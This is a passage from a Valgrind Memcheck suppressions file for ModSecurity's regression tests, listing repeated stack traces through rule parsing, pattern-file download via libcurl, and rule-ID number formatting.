fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_mutateEmmPKcm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_mutateEmmPKcm fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_S_copy_chars fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE12_M_constructIPKcEEvT_S8_St20forward_iterator_tag.isra.24 fun:_M_construct_aux fun:_M_construct fun:basic_string fun:basic_stringbuf fun:basic_stringstream fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove fun:copy fun:_S_copy fun:_S_copy_chars fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE12_M_constructIPKcEEvT_S8_St20forward_iterator_tag.isra.24 fun:_M_construct_aux fun:_M_construct fun:basic_string fun:basic_stringbuf fun:basic_stringstream fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:assign fun:_M_set_length fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE12_M_constructIPKcEEvT_S8_St20forward_iterator_tag.isra.24 fun:_M_construct_aux fun:_M_construct fun:basic_string fun:basic_stringbuf fun:basic_stringstream fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:tolower fun:acmp_add_pattern fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtod_l_internal fun:__stoa fun:stod fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_lshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_lshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memcpy@GLIBC_2.2.5 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_cmp fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_cmp fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memcpy@GLIBC_2.2.5 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memcpy@GLIBC_2.2.5 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul_1 fun:__mpn_mul fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul_1 fun:__mpn_mul fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul_1 fun:__mpn_mul fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_rshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ 